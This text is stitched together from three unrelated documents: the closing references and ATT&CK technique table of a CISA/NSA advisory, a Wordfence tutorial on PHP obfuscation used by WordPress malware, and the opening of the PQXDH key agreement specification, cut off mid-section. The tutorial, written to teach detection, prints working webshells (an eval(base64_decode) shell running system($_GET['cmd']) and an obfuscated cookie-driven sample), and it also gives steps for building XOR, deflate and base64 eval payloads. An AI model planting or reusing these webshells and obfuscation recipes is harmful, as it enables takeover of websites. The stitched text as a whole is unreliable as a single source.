[42]  Joint CSA: NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems, https://media.defense.gov/2020/Jul/23/2002462846/-1/-1/0/OT_ADVISORY-DUAL-OFFICIAL-20200722.PDF
[43]  NSA, Stop Malicious Cyber Activity Against Connected Operational Technology, https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/0/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF
[44]  NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
[45]  NSA, Update and Upgrade Software Immediately, https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf
[46]  Microsoft, Microsoft Security Advisory 2871997: Update to Improve Credentials Protection and Management, https://learn.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2871997
[47]  CISA, Secure Cloud Business Applications Hybrid Identity Solutions Architecture, https://www.cisa.gov/sites/default/files/2023-03/csso-scuba-guidance_document-hybrid_identity_solutions_architecture-2023.03.22-final.pdf
[48]  CISA, Secure Cloud Business Applications (SCuBA) Project, https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project
[49]  NSA, Transition to Multi-factor Authentication, https://media.defense.gov/2019/Sep/09/2002180346/-1/-1/0/Transition%20to%20Multi-factor%20Authentication%20-%20Copy.pdf
[50]  Committee on National Security Systems (CNSS), CNSS Policy 15, https://www.cnss.gov/CNSS/issuances/Policies.cfm
[51]  NSA, NSA Releases Future Quantum-Resistant (QR) Algorithm Requirements for National Security Systems, https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/3148990/nsa-releases-future-quantum-resistant-qr-algorithm-requirements-for-national-se/
[52]  NSA, Enforce Signed Software Execution Policies, https://media.defense.gov/2019/Sep/09/2002180334/-1/-1/0/Enforce%20Signed%20Software%20Execution%20Policies%20-%20Copy.pdf
[53]  Joint CSI: Keeping PowerShell: Security Measures to Use and Embrace, https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF
[54]  NIST, NIST SP 800-218: Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities, https://csrc.nist.gov/publications/detail/sp/800-218/final

Disclaimer of Endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Trademarks

Active Directory, Microsoft, and Windows are registered trademarks of Microsoft Corporation.
MITRE ATT&CK is a registered trademark and MITRE D3FEND is a trademark of The MITRE Corporation.
SoftPerfect is a registered trademark of SoftPerfect Proprietary Limited Company.
Telerik is a registered trademark of Progress Software Corporation.
VMware is a registered trademark of VMware, Inc.
Zimbra is a registered trademark of Synacor, Inc.

Purpose

This document was developed in furtherance of the authoring cybersecurity organizations’ missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact

Cybersecurity Report Feedback: CybersecurityReports@nsa.gov
General Cybersecurity Inquiries: Cybersecurity_Requests@nsa.gov 
Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov 

To report suspicious activity contact CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Appendix: MITRE ATT&CK Tactics and Techniques

See Table 12–Table 21 for all referenced threat actor tactics and techniques in this advisory.

Technique Title | ID | Use
Active Scanning: Vulnerability Scanning | T1595.002 | Malicious actors scan victims for vulnerabilities that can be exploited for initial access.
Gather Victim Host Information | T1592 | Malicious actors gather information on victim client configurations and/or vulnerabilities through vulnerability scans and searching the web.
Gather Victim Identity Information: Credentials | T1589.001 | Malicious actors find default credentials through searching the web.
Phishing for Information | T1598 | Malicious actors masquerade as IT staff and convince a target user to provide their MFA code over the phone to gain access to email and other organizational resources.
Technique Title | ID | Use
External Remote Services | T1133 | Malicious actors use default credentials for VPN access to internal networks.
Valid Accounts: Default Accounts | T1078.001 | Malicious actors gain authenticated access to devices by finding default credentials through searching the web. Malicious actors use default credentials for VPN access to internal networks, and default administrative credentials to gain access to web applications and databases.
Exploit Public-Facing Application | T1190 | Malicious actors exploit CVEs in Telerik UI, VMware Horizon, Zimbra Collaboration Suite, and other applications for initial access to victim organizations.
Phishing | T1566 | Malicious actors gain initial access to systems by phishing to entice end users to download and execute malicious payloads.
Trust Relationship | T1199 | Malicious actors gain access to OT networks despite prior assurance that the networks were fully air gapped, with no possible connection to the IT network, by finding special purpose, forgotten, or even accidental network connections.
Technique Title | ID | Use
Software Deployment Tools | T1072 | Malicious actors use default or captured credentials on software deployment tools to execute code and move laterally.
User Execution | T1204 | Malicious actors gain initial access to systems by phishing to entice end users to download and execute malicious payloads or to run code on their workstations.
Command and Scripting Interpreter | T1059 | Malicious actors use scripting languages to obscure their actions and bypass allowlisting.
Command and Scripting Interpreter: Visual Basic | T1059.005 | Malicious actors use macros for initial access, persistence, and lateral movement.
Technique Title | ID | Use
Account Manipulation | T1098 | Malicious actors reset built-in administrative accounts via predictable, forgotten password questions.
Technique Title | ID | Use
Valid Accounts | T1078 | Malicious actors analyze topical and nested Active Directory groups to find privileged accounts to target.
Valid Accounts: Domain Accounts | T1078.002 | Malicious actors obtain loaded domain credentials from printers and scanners and use them to move laterally from the network device.
Exploitation for Privilege Escalation | T1068 | Malicious actors load vulnerable drivers and then exploit their known vulnerabilities to execute code in the kernel with the highest level of system privileges to completely compromise the device.
Technique Title | ID | Use
Obfuscated Files or Information: Command Obfuscation | T1027.010 | Malicious actors often use scripting languages to obscure their actions.
Technique Title | ID | Use
Adversary-in-the-Middle | T1557 | Malicious actors force a device to communicate through actor-controlled systems, so they can collect information or perform additional actions.
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | T1557.001 | Malicious actors execute spoofing, poisoning, and relay techniques if Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Server Message Block (SMB) services are enabled in a network.
Brute Force: Password Cracking | T1110.002 | Malicious actors capture user hashes and leverage dictionary wordlists and rulesets to extract cleartext passwords.
Credentials from Password Stores | T1555 | Malicious actors gain access to and crack credentials from PFX stores, enabling elevation of privileges and lateral movement within networks.
Multi-Factor Authentication Interception | T1111 | Malicious actors can obtain password hashes for accounts enabled for MFA with smart cards or tokens and use the hash via PtH techniques.
Multi-Factor Authentication Request Generation | T1621 | Malicious actors use “push bombing” against non-phishing-resistant MFA to induce “MFA fatigue” in victims, gaining access to MFA authentication credentials or bypassing MFA, and accessing the MFA-protected system.
Steal Application Access Token | T1528 | Malicious actors can steal administrator account credentials and the authentication token generated by Active Directory when the account is logged into a compromised host.
Steal or Forge Authentication Certificates | T1649 | Unauthenticated malicious actors coerce an ADCS server to authenticate to an actor-controlled server, and then relay that authentication to the web certificate enrollment application to obtain a trusted illegitimate certificate.
Steal or Forge Kerberos Tickets: Golden Ticket | T1558.001 | Malicious actors who have obtained authentication certificates can use the certificate for Active Directory authentication to obtain a Kerberos TGT.
Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003 | Malicious actors obtain and abuse valid Kerberos TGTs to elevate privileges and laterally move throughout an organization’s network.
Unsecured Credentials: Credentials in Files | T1552.001 | Malicious actors find cleartext credentials that organizations or individual users store in spreadsheets, configuration files, and other documents.
Technique Title | ID | Use
Account Discovery | T1087 | Malicious actors with valid domain credentials enumerate the AD to discover elevated accounts and where they are used.
File and Directory Discovery | T1083 | Malicious actors use commands, such as net share; open source tools, such as SoftPerfect Network Scanner; or custom malware, such as CovalentStealer, to discover and categorize files. Malicious actors search for text files, spreadsheets, documents, and configuration files in hopes of obtaining desired information, such as cleartext passwords.
Network Share Discovery | T1135 | Malicious actors use commands, such as net share; open source tools, such as SoftPerfect Network Scanner; or custom malware, such as CovalentStealer, to look for shared folders and drives.
Technique Title | ID | Use
Exploitation of Remote Services | T1210 | Malicious actors can exploit OS and firmware vulnerabilities to gain unauthorized network access, compromise sensitive data, and disrupt operations.
Remote Services: SMB/Windows Admin Shares | T1021.002 | If SMB signing is not enforced, malicious actors can use name resolution poisoning to access remote systems.
Use Alternate Authentication Material: Application Access Token | T1550.001 | Malicious actors with stolen administrator account credentials and AD authentication tokens can use them to operate with elevated permissions throughout the domain.
Use Alternate Authentication Material: Pass the Hash | T1550.002 | Malicious actors collect hashes in a network and authenticate as a user without having access to the user’s cleartext password.
Technique Title | ID | Use
Data from Network Shared Drive | T1039 | Malicious actors find sensitive information on network shares that could facilitate follow-on activity or provide opportunities for extortion.

Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a

Know your Malware – A Beginner’s Guide to Encoding Techniques Used to Obfuscate Malware

Ram Gall
October 2, 2023

With the launch of Wordfence CLI, our high performance security scanner that can detect the vast majority of PHP malware targeting WordPress, Wordfence continues to emphasize the importance of malware detection and remediation. Malware targeting WordPress uses a variety of obfuscation techniques to avoid detection, and today’s post dives into some of the most common built-in PHP functionality malware often makes use of in order to do this.

What is Obfuscation?

Obfuscation is the process of concealing the purpose or functionality of code or data so that it evades detection and is more difficult for a human or security software to analyze, but still fulfills its intended purpose.

Obfuscation makes use of various types of encoding techniques, but is not exactly the same thing as encoding. There are countless legitimate uses for encoding data, including saving space through compression, transmitting data over a network, and packaging code so that it can be easily interpreted by programs in an expected format. Meanwhile obfuscation is intentionally designed to prevent understanding and detection by humans and security software.

Obfuscation is also different from encryption in that it can typically be reversed without a “key”, though there are some encoding techniques, such as XOR encoding, which do use keys and are used in both encryption and obfuscation.

Encoding Techniques

Since obfuscation often relies heavily on encoding techniques, it’s important to understand what these techniques look like, their typical legitimate use cases, and signs that they’re being used to hide something potentially malicious. In today’s article, we will cover some of the most commonly used encoding techniques, and teach you how to spot legitimate uses as well as potentially suspicious patterns.

Base64 Encoding

What is Base64 encoding?

Base64 encoding is widely used to send and store data. If you’ve ever played with Linux and tried to look at an executable file using the cat command, you might have noticed that your terminal starts acting very strangely. This is because binary data includes an enormous number of potential byte sequences, and software that’s not designed to interpret a particular file format can incorrectly interpret some of these sequences as commands.

Base64 encoding allows any data, including binary data, to be stored and transmitted as text which makes it very convenient for programs to talk to one another without being misunderstood, especially over a network.
It uses 26 lower-case letters, 26 upper-case letters, the digits 0-9, and the ‘+’ and ‘/’ symbols for a total of 64 characters, plus ‘=’ for padding.

Note that, unlike the Base 8 (octal) and Base 16 (hexadecimal) encodings we’ll cover later, Base64 is not a direct per-byte representation of the underlying data. Instead, it splits the bytes into 6-bit groups, treats each group as a number from 0 to 63, and uses a lookup table to assign it a character. You can find out more about this process in the Wikipedia article on Base64 encoding.

How is Base64 Encoding Used Legitimately?

You’ve likely seen base64 encoded data in the past, and it’s very easy to spot – for instance, SGVsbG8sIFdvcmxkIQ== decodes to “Hello, World!” and you can run the code snippet:

<?php echo base64_decode('SGVsbG8sIFdvcmxkIQ==');

to see this in action.

PHP uses the base64_encode and base64_decode functions to encode and decode Base64-encoded data. Many applications store information in this format as data files or database entries, so the presence of the base64_encode and base64_decode functions in a PHP file are often no cause for concern on their own.
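
As a quick illustration of that legitimate pattern (a minimal sketch, not taken from any particular application), arbitrary data can be made text-safe before storage and recovered unchanged:

<?php
// Make structured data text-safe for storage or transport, then recover it.
$settings = json_encode(['theme' => 'dark', 'retries' => 3]);
$stored   = base64_encode($settings);            // safe to put in a text column or config file
var_dump(base64_decode($stored) === $settings);  // bool(true)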

How is Base64 Encoding Used by Malware?

It is significantly less common for base64-encoded data to be hardcoded into a PHP file, especially one that executes it as code.

For example,

<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7'));

is a minimalist webshell. The eval function tells PHP to execute whatever is decoded by the base64_decode function as PHP, so once the string of data c3lzdGVtKCRfR0VUWydjbWQnXSk7 is decoded, it will execute system($_GET['cmd']);.

This uses the system function to run the contents of the cmd query string parameter as a terminal command. This means that if this webshell was installed on a site as webshell.php, an attacker could go to http://victimsite.com/webshell.php?cmd=ls to run the ls command and list all files in the directory.
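
To see what a payload like this contains without running it, the encoded string can be decoded on its own rather than passed to eval. A minimal sketch using the same string from the example above:

<?php
// Decode the webshell's payload without eval()'ing it, so it can be inspected safely.
echo base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7');
// Prints: system($_GET['cmd']);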

Byte Escape Sequences

What are Byte Escape Sequences?

You might already be familiar with some escape sequences, such as \n to denote a new line of text, or \t to denote a tab, but they can also be used to represent binary data.

PHP uses byte escape sequences for this, and they are similar to base64 encoding in that they are a way to represent both text and binary data as text strings.

There are two commonly used byte escape sequence formats used in PHP – Hexadecimal, which uses Base 16, and Octal, which uses Base 8.

Hex encoded byte sequences are represented by \x followed by two characters, which can be any digit from 0 through 9 and the letters ‘a’ through ‘f’.

For example, the text “Hello, World!” can be represented as the following escaped sequence:
\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21.

Octal byte sequences are represented by ‘\’ followed by a one to three digit number from 0 through 377.

For example, the text “Hello, World!” can be represented as the following escaped sequence:
\110\145\154\154\157\54\40\127\157\162\154\144\41.

If you’ve ever worked with Linux filesystem permissions, they are also stored in octal format, for example ‘777’ which denotes that all users have permission to read, write, and execute.

PHP also uses unicode escape sequences, which begin with \u and can be used to encode unicode characters used for international languages as well as emojis. While unicode escape sequences can be used to bypass security systems, they are less commonly used in malware, and are beyond the scope of this article. If you’d like to learn more about unicode escape sequences, a good resource can be found here. Note that the article is targeted at JavaScript developers, but provides an excellent overview of the concepts involved.

How are Byte Escape Sequences Used Legitimately?

Byte escape sequences are used to store binary information, and many PHP applications use them to store encryption keys and to perform operations that can be sped up by handling binary data directly. As such they are most often found in code libraries for handling encryption and text manipulation and conversion.
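
As a small sketch of that legitimate use (the key value here is just an illustration), a short binary key can be written with hex escape sequences and inspected with bin2hex:

<?php
// Four raw bytes written as hex escape sequences, not the eight-character text "deadbeef".
$key = "\xde\xad\xbe\xef";
echo strlen($key);   // 4
echo "\n";
echo bin2hex($key);  // deadbeef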

How are Byte Escape Sequences Used by Malware?

PHP has an unusual property – any byte escape sequence surrounded by double quotes ("") is automatically parsed. Moreover, PHP can interpret any valid combination of text, hex escape sequences, octal escape sequences, and unicode escape sequences in a single string. In other words, “He\x6c\x6c\x6f\54\40\127\157rld!” will be processed by PHP as “Hello, World!”. You can actually test this using the following code snippet:

1<?php echo"He\x6c\x6c\x6f\54\40\127\157rld!";

The fact that PHP can easily interpret such sequences but humans usually cannot read them makes byte escape sequences ideal for obfuscation. It is very unusual for legitimate software to use mixed encodings in this manner, and so it is a very strong indicator of malicious activity.

Character Encoding

What is Character Encoding?

Character encoding is similar to hex encoding but more limited in that it can only be used to represent text and a very limited subset of control characters. PHP uses the chr function to decode a number between 0 and 255 into a single character, and the ord function to encode a single character back into a numeric value. This is slightly complicated by the fact that the chr function accepts decimal, hexadecimal, and octal formatted numbers, but decimal format is most commonly used.

The following code provides an example of character encoding utilizing chr, and would output “Hello, World!” when executed:

<?php echo chr(72).chr(101).chr(108).chr(108).chr(111).chr(44).chr(32).chr(87).chr(111).chr(114).chr(108).chr(100).chr(33);

Legitimate use of character encoding is somewhat rare in PHP, though it is occasionally used for text manipulation and inserting control characters such as null bytes in place of hex or octal encoding. It is far more commonly used in languages such as JavaScript where the code is often publicly visible.

One common use case is “reverse obfuscation” where character encoding in JavaScript is used to render an email address on a site in a way that a human can read it once the code is executed, but that older automated tools that can only view the uninterpreted code have difficulty scraping.

How is Character Encoding Used by Malware?

Character encoding is used by malware in almost exactly the same way as byte escape sequences, that is, to make the code more difficult for a human to read and security tools to interpret. It is frequently used by malware to hide malicious URLs that the malware then sends sensitive information or redirects visitors to.
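
For example (using a placeholder domain rather than a real indicator), a redirect destination can be assembled from chr calls so the URL never appears as plain text in the file:

<?php
// Hypothetical illustration: the URL below decodes to http://example.com
$url = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47)
     . chr(101).chr(120).chr(97).chr(109).chr(112).chr(108).chr(101)
     . chr(46).chr(99).chr(111).chr(109);
echo $url;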

Substitution Ciphers (rot13, etc.)

What are Substitution Ciphers?

One of the simplest ways to obfuscate content is to simply substitute each letter for another letter. This method is known as a Caesar cipher, and most programming languages have a built-in way to apply it. The most popular variant, rot13, replaces each letter with the one halfway across the alphabet from it, 13 steps away; as such, “Hello, World!” becomes “Uryyb, Jbeyq!” The rot13 substitutions can be seen in the following table:

A => N

B => O

C => P

D => Q

E => R

F => S

G => T

H => U

I => V

J => W

K => X

L => Y

M => Z

N => A

O => B

P => C

Q => D

R => E

S => F

T => G

U => H

V => I

W => J

X => K

Y => L

Z => M

How are Substitution Ciphers Used Legitimately?

It is uncommon for substitution ciphers to be used in well-architected code, but some legitimate software does use them as a workaround when it has issues running in an environment where naive or poorly configured security software might hinder its intended execution, or when a value needs to be stored that won’t be interfered with by code that is looking for that value. In other words, they are almost always used to evade detection of some kind, even by legitimate software.

How are Substitution Ciphers Used by Malware?

Malware frequently uses the str_rot13 function to obfuscate malicious URLs that it sends sensitive data to, redirects visitors to, or receives commands from, and that might be on a blocklist. It is a relatively strong signal of suspicious behavior, though it is not strong enough on its own to mark a file as malicious.
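
For instance (again using a placeholder domain rather than a real malicious URL), a blocklisted address can be stored in its rot13 form and only turned back into a usable URL at runtime:

<?php
// 'uggc://rknzcyr.pbz' is rot13 for http://example.com (a placeholder, not a real indicator).
$hidden = 'uggc://rknzcyr.pbz';
echo str_rot13($hidden);  // http://example.com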

Compression (gzencoding, zlib encoding, and more)

What is Compression?

Compression refers to the process of compacting data, making it take up less space for storage and less bandwidth for transport. Compression algorithms are fairly complex, though many of them work in part by finding repeated patterns and storing references to them rather than the entire data.

As a very basic example, the text “aaaaabbbccca” could potentially be compressed to “a5b3c3a”. Real compression algorithms are significantly more sophisticated, and there are many other steps involved depending on the type of data being compressed.

There are a number of commonly used compression algorithms, including ones specifically designed to compress images, movies, and audio files. Media compression algorithms are often “lossy” and do not perfectly reconstruct the original data so much as produce output that looks or sounds similar enough to a human that it’s hard to notice.

In today’s article we are going to focus specifically on the functions most commonly used by PHP to compress and decompress arbitrary data, which use “lossless” compression and can perfectly reconstruct the original data from the archived format.

How is Compression Used Legitimately?

Most people are familiar with zip files, and many websites use compression to load large amounts of content more quickly while saving money on outbound data transfer. The most common compression algorithms used in PHP are Zlib and Gzip, both of which are handled by the Zlib module, though BZip2 is also fairly common.

Note that Gzip is not exactly the same thing as the zip files you may be familiar with, as it can only compress a single file, while modern zip archives can be configured to use many different algorithms, including the one used by Gzip. There is a workaround to the single-file problem, however: it is very common to combine multiple files into a “tarball” and then compress the combined file using gzip, which is what a file with a .tar.gz extension is.

Gzip uses an algorithm called “DEFLATE” which tends to be very fast and is often used by web servers to compress outbound data over the network. This process is effectively transparent – if configured correctly, a web server will send out a compressed page and your browser will automatically and transparently decompress and load it. Zlib and Bzip2 are slower but attain higher compression ratios so they’re often used to store archive files.
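
As a quick sketch of the lossless round trip these functions provide, a repetitive string can be deflated and then inflated back unchanged:

<?php
// Lossless round trip using the Zlib module's DEFLATE helpers.
$original   = str_repeat('aaaaabbbccc', 20);   // repetitive data compresses well
$compressed = gzdeflate($original);
echo strlen($original) . ' -> ' . strlen($compressed) . " bytes\n";
echo gzinflate($compressed) === $original ? "round trip OK\n" : "mismatch\n";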

How is Compression Used by Malware?

Compressed files have a unique advantage for malicious actors – it is difficult to spot particular data in them, especially at high compression ratios. However, they also can’t easily be executed directly in the context of PHP. Compression isn’t limited to just files – any data, including text strings can be compressed. This means that an attacker can use compression to hide their code in a file and uncompress and execute it at runtime using, for instance, the gzinflate and gzuncompress functions.

There is one hurdle, however, which is that compressed files contain binary data, that is, data that can’t be directly represented as a text string. One solution to this is to load the compressed data from a separate, appropriately formatted file. Since attackers can often only upload a single file to take control of a site, this can be impractical.

While it is possible to mix string and raw binary data in a single file, reading these separately often requires knowing exactly where in the file everything is, which may be difficult if the file was uploaded or written by exploiting a vulnerability.

Earlier in the article, we discussed ways to safely store binary data in a text string, such as base64 encoding and byte escape sequences. These become significantly more useful to attackers when combined with compression algorithms, and we’ll examine this use case shortly.
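
As a benign sketch of that combination (the payload here is just a harmless string, not real malware), compressed binary data can be wrapped in base64 so it survives as text inside a PHP file, then unwrapped and decompressed at runtime:

<?php
// Encode: compress a string, then base64 it so the binary output is text-safe.
$payload = base64_encode(gzdeflate('just a harmless string'));

// Decode: reverse the steps to recover the original data.
echo gzinflate(base64_decode($payload));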

XOR Encoding

What is XOR Encoding?

XOR (eXclusive OR) is a simple way to mix two sets of data together at the binary level, meaning it operates on the 1s and 0s that make up data. Think of it as a lightweight disguise for data. It takes two bits (a 1 or a 0) and compares them. If the bits are the same, it outputs 0; if they’re different, it outputs 1.

Here’s an example:

0 XOR 0 = 0
0 XOR 1 = 1
1 XOR 0 = 1
1 XOR 1 = 0

In PHP, you would use the ^ symbol to do an XOR operation between two characters. What actually happens is that the computer looks at the binary form of these characters and does the XOR bit by bit.

For example, the letter ‘A’ in binary is 01000001, and ‘B’ is 01000010. When you XOR them:

01000001
01000010
——–
00000011

You get a jumbled mix of the two. What makes XOR particularly useful is that if you take this result and do the exact same XOR operation on it again with ‘B’, you’ll get back ‘A’.
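
Here is a minimal sketch of that reversibility in PHP, masking a string with a repeated single-byte key and then recovering it with the same key:

<?php
$plain = 'Hello, World!';
$key   = str_repeat('K', strlen($plain));  // repeat the one-byte key to match the string length

$masked = $plain ^ $key;   // XOR once: the result is unreadable bytes
echo $masked ^ $key;       // XOR again with the same key: Hello, World!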

How is XOR Encoding Used Legitimately?

In practical terms, XOR is used for basic encryption or data masking. It’s fast and doesn’t require a lot of computing power. For example, if you have a secret key that both the sender and receiver know, you could XOR your message with this key to obscure the text before sending it over the internet. The downside to this is that it is usually trivial to find the “key” using statistical analysis, so while XOR encoding is used as part of a much more complex process by many strong encryption schemes, it is not secure encryption on its own.

How is XOR Encoding Used by Malware?

XOR encoding is particularly useful for attackers who want to restrict access to malware, such as webshells, used to control a website. For instance, by making the XOR “key” a value that isn’t present in the malware itself but is passed in by an input parameter, it acts as a password protection mechanism that makes the malware unable to run unless an attacker who knows the key sends a specially crafted request. Likewise, needing the key to deobfuscate the malware makes it much more difficult for security analysts and scanners to identify malicious behavior.

The following malicious file stores an obfuscated decoder in the malware itself, but requires commands to be encoded to match its scheme before they can be processed. It base64-decodes each incoming $_COOKIE value (using the function name hidden in $odqwv), XORs the result against its cookie name, then executes the decoded commands.

<?php $odqwv = "\x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc" ^ "trhvvbuzeadricgobq"; $mvxr = $_COOKIE; foreach($mvxr as $q=>$h){$mvxr[$q] = $odqwv($h) ^ str_pad($q, strlen($h), $q);} $zgas = $mvxr["dj"](); $lo = $mvxr["ayy"]($zgas); $lo = $lo['uri']; $mvxr["l"]($zgas, $mvxr["mdcgv"]); require($lo); $mvxr["kxldb"]($zgas); $mvxr["rfmcipa"]($lo); ?>

This means that an attacker who knows this scheme can send cookie values that have been XORed against their cookie names and then base64-encoded in advance; the file reverses those steps and executes the result.

In this example, $odqwv is the XORed value of \x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc and "trhvvbuzeadricgobq", which turns out to be “base64_decode.” You can find this value by creating a simple one-liner

<?php $odqwv = "\x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc" ^ "trhvvbuzeadricgobq"; echo $odqwv; ?>

which prints the value. In this case $odqwv ends up holding the literal string “base64_decode”, and because PHP supports variable function calls, the malware’s $odqwv($h) invokes the built-in base64_decode function on each cookie value.

Each value in $_COOKIE is therefore base64-decoded and then XORed against its own cookie name (repeated to the value’s length with str_pad), and the decoded results are used as function names and arguments, with similar steps occurring throughout the rest of the code.

Putting it All Together

Most obfuscated malware uses a combination of these techniques to hide its functionality, and combined techniques are one of the clearest indications of malicious activity. For example, take the following code:

<?php
$base64_data = "09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA=";
$xor_key = $_GET['k'];
$decoded_base64 = base64_decode($base64_data);
$inflated_data = gzinflate($decoded_base64);
$xor_decoded = $inflated_data ^ str_repeat($xor_key, strlen($inflated_data));
eval($xor_decoded);
?>

If supplied with the correct $xor_key, it will output “Hello, World!”.

Let’s take a look at how we did this:
First, we took the code 'echo "Hello, World!";' and XOR-encoded it with a key value of ‘K’, resulting in the jumbled output .(#$ki.''$gk$9'/jip (two of the encoded bytes are non-printable control characters, so they do not render here).

We then ran it through the gzdeflate function, which results in a binary output that can’t be rendered here, but after base64-encoding that output it turns into 09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA=.

If you placed the code in a hello.php file on your site and accessed it, you’d get a blank screen unless you sent a request to /hello.php?k=K, which would output “Hello, World!”.
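
If you want to reproduce a payload like this yourself, the sketch below (our own illustration, using the same ‘K’ key and plaintext as the example) runs the decoder’s steps in reverse: XOR, then gzdeflate, then base64_encode. The exact base64 string can differ slightly depending on compression settings, but gzinflate() in the decoder will still recover the original code:

<?php
// Build an obfuscated payload: XOR with the key, deflate, then base64-encode.
$plaintext = 'echo "Hello, World!";';
$key       = 'K';
$xored     = $plaintext ^ str_repeat($key, strlen($plaintext));
$payload   = base64_encode(gzdeflate($xored));
echo $payload; // paste this into $base64_data in the decoder above
?>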

While this example only outputs “Hello, World!” when it is passed the right key, it is trivial to disguise any PHP code in this manner, including destructive code that adds malicious administrators, creates additional malicious files, or alters system settings.

Conclusion

In today’s article, we discussed the most commonly used encoding techniques in PHP, their legitimate applications, and how malicious code uses them to obfuscate its purpose and intent. While obfuscation is an arms race, the Wordfence scanner and Wordfence CLI both use our incredibly effective malware detection signatures and are able to detect the vast majority of obfuscated malware targeting WordPress. A large part of why this is possible is due to our expertise and deep understanding of these encoding techniques and which combinations of encoding tend to indicate malicious behavior. Our experienced security analysts are continuously writing new signatures to improve our detection capabilities.

In a future article, we’ll cover more advanced obfuscation techniques that rely on other properties and quirks of PHP, but it’s necessary to understand basic encoding methods first because of how frequently they’re used, even when they’re not the primary method of obfuscation.

We encourage readers who want to learn more about this to experiment with the various code snippets we have presented. More advanced readers may wish to review public malware repositories in order to better learn to spot these indicators, but be sure to be careful with any actual malware samples you find and only execute them in a virtual environment, as even PHP malware can be used for local privilege escalation on vulnerable machines.

Security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID can submit their findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.


Source :
https://www.wordfence.com/blog/2023/10/know-your-malware-a-beginners-guide-to-encoding-techniques-used-to-obfuscate-malware/

The PQXDH Key Agreement Protocol

Revision 1, 2023-05-24

Ehren Kret, Rolfe Schmidt

1. Introduction

This document describes the “PQXDH” (or “Post-Quantum Extended Diffie-Hellman”) key agreement protocol. PQXDH establishes a shared secret key between two parties who mutually authenticate each other based on public keys. PQXDH provides post-quantum forward secrecy and a form of cryptographic deniability but still relies on the hardness of the discrete log problem for mutual authentication in this revision of the protocol.

PQXDH is designed for asynchronous settings where one user (“Bob”) is offline but has published some information to a server. Another user (“Alice”) wants to use that information to send encrypted data to Bob, and also establish a shared secret key for future communication.

2. Preliminaries

2.1. PQXDH parameters

An application using PQXDH must decide on several parameters:

Name        Definition
curve       A Montgomery curve for which XEdDSA [1] is specified, at present this is one of curve25519 or curve448
hash        A 256 or 512-bit hash function (e.g. SHA-256 or SHA-512)
info        An ASCII string identifying the application with a minimum length of 8 bytes
pqkem       A post-quantum key encapsulation mechanism (e.g. Crystals-Kyber-1024 [2])
EncodeEC    A function that encodes a curve public key into a byte sequence
DecodeEC    A function that decodes a byte sequence into a curve public key and is the inverse of EncodeEC
EncodeKEM   A function that encodes a pqkem public key into a byte sequence
DecodeKEM   A function that decodes a byte sequence into a pqkem public key and is the inverse of EncodeKEM

For example, an application could choose curve as curve25519, hash as SHA-512, info as “MyProtocol”, and pqkem as CRYSTALS-KYBER-1024.

The recommended implementation of EncodeEC consists of a single-byte constant representation of curve followed by little-endian encoding of the u-coordinate as specified in [3]. The single-byte representation of curve is defined by the implementer. Similarly the recommended implementation of DecodeEC reads the first byte to determine the parameter curve. If the first byte does not represent a recognized curve, the function fails. Otherwise it applies the little-endian decoding of the u-coordinate for curve as specified in [3].
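
As a non-normative illustration of this recommendation, the following PHP sketch implements EncodeEC and DecodeEC for curve25519 using an arbitrary ID byte of 0x05; the actual single-byte representation is left to the implementer.

    <?php
    // Non-normative sketch of EncodeEC/DecodeEC for curve25519.
    // The ID byte 0x05 is an arbitrary illustrative choice.
    const CURVE25519_ID = "\x05";

    function encode_ec(string $u_le_bytes): string
    {
        // RFC 7748 already represents the u-coordinate as 32 little-endian bytes.
        return CURVE25519_ID . $u_le_bytes;
    }

    function decode_ec(string $encoded): string
    {
        if (strlen($encoded) !== 33 || $encoded[0] !== CURVE25519_ID) {
            throw new InvalidArgumentException("unrecognized curve or malformed key");
        }
        return substr($encoded, 1);
    }
    ?>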

The recommended implementation of EncodeKEM consists of a single-byte constant representation of pqkem followed by the encoding of PQKPK specified by pqkem. The single-byte representation of pqkem is defined by the implementer. Similarly the recommended implementation of DecodeKEM reads the first byte to determine the parameter pqkem. If the first byte does not represent a recognized key encapsulation mechanism, the function fails. Otherwise it applies the decoding specified by the selected key encapsulation mechanism.

2.2. Cryptographic notation

